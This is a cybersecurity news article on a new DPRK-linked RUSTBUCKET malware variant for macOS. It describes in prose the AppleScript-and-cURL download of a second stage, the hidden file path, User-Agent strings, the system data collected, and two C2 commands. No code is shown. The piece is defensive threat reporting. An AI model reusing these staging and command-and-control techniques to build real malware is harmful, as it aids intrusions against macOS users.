Cyber Security News

New RUSTBUCKET Malware With Zero Detections on VirusTotal

The DPRK campaign is utilizing a recently updated version of Rustbucket malware to avoid being detected.

This variant of RUSTBUCKET, targets macOS systems, adds persistence capabilities not previously observed and, at the time of reporting, is undetected by VirusTotal signature engines.

The Elastic Security Labs team has detected a new variant of the RUSTBUCKET malware, a family that has been previously attributed to the BlueNorOff group by Jamf Threat Labs in April 2023. 

The DPRK conducts malicious cyber activities and deploys information technology (IT) workers who fraudulently obtain employment to generate revenue.

RUSTBUCKET Malware Infection Chain

As per the research RUSTBUCKET family of malware is under active development. Additionally, at the time of publication, this new variant has zero detections on VirusTotal and is leveraging a dynamic network infrastructure methodology for command and control.

The command /usr/bin/osascript  has been used to execute the AppleScript which is responsible for downloading  Stage 2 binary from the C2 using cURL. 

This session includes the string pd in the body of the HTTP request and cur1-agent as the User-Agent string which saves the Stage 2 binary to /users/shared/.pd, 

The Stage 2 binary (.pd) is compiled in Swift and operates based on command-line arguments. The binary expects a C2 URL to be provided as the first parameter when executed. 

Upon execution, it invokes the downAndExec function, which is responsible for preparing a POST HTTP request. 

To initiate this request, the binary sets the User-Agent string as mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) and includes the string pw in the body of the HTTP request.

During execution, the malware utilizes specific macOS APIs for various operations. It begins with NSFileManager’s temporaryDirectory function to obtain the current temporary folder, then generates a random UUID using NSUUID’s UUID.init method. 

Finally, the malware combines the temporary directory path with the generated UUID to create a unique file location and writes the payload to it.

Once the payload is written to disk, the malware utilizes NSTask to initiate its execution.

Gathers System Information

The malware initiates its operations by dynamically generating a 16-byte random value at runtime. This value serves as a distinctive identifier for the specific instance of the active malware. Subsequently, the malware proceeds to gather comprehensive system information, including:

  • Computer name
  • List of active processes
  • Current timestamp
  • Installation timestamp
  • System boot time
  • Status of all running processes within the system

The malware establishes its initial connection to the C2 server by transmitting the gathered data via a POST request. The request is accompanied by a User-Agent string formatted as Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0).

Upon receiving the request, the C2 server responds with a command ID, which serves as an instruction for the malware. The malware is designed to handle only two commands.

Command ID 0x31-to self-terminate

Command ID 0x30-This command enables the operator to upload malicious Mach-O binaries or shell scripts to the system and execute them.

The malware proceeds by granting execution permissions to the uploaded file using the chmod API.After executing the payload, the malware sends a status update to the server, notifying it of the completed execution, and then sleeps for 60 seconds. 

Following this delay, the malware loops to collect system information once again and remains in a waiting state, anticipating the arrival of the next command from the server.

The multi-stage composition of the malware, in addition to the use of Rust programming language and the targeting of macOS, make detection and prevention a significant challenge. 

Indicator of compromise:


“AI-based email security measures Protect your business From Email Threats!” – Request a Free Demo.


Sujatha is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under her belt in Cyber Security, she is covering Cyber Security News, technology and other news.

Recent Posts

SSNDOB Marketplace Admin Jailed for Selling millions of Americans Data

In a resounding triumph for justice, U.S. District Judge Kathryn Kimball Mizelle has sentenced Vitalii…

12 hours ago

Is Your Online Store Hacked in a Carding Attack? Here’s an Action Plan to Protect

Hackers are plotting to benefit from the generosity of Halloween, Thanksgiving, and Christmas shoppers using…

15 hours ago

Google Researchers Find Out How ChatGPT Queries Can Collect Personal Data

The LLMs (Large Language Models) are evolving rapidly with continuous advancements in their research and…

15 hours ago

New Android Malware Employs Various Tactics to Deceive Malware Analyst

In the dynamic realm of mobile application security, cybercriminals employ ever more sophisticated forms of…

17 hours ago

DJvu Ransomware Mimic as Cracked Software to Compromise Computers

A recent campaign has been observed to be delivering DJvu ransomware through a loader that…

18 hours ago

Okta Hack: Threat Actors Downloaded all Customer Support System Users’ Data

In a pivotal update to the Okta security incident divulged in October 2023, Okta Security…

19 hours ago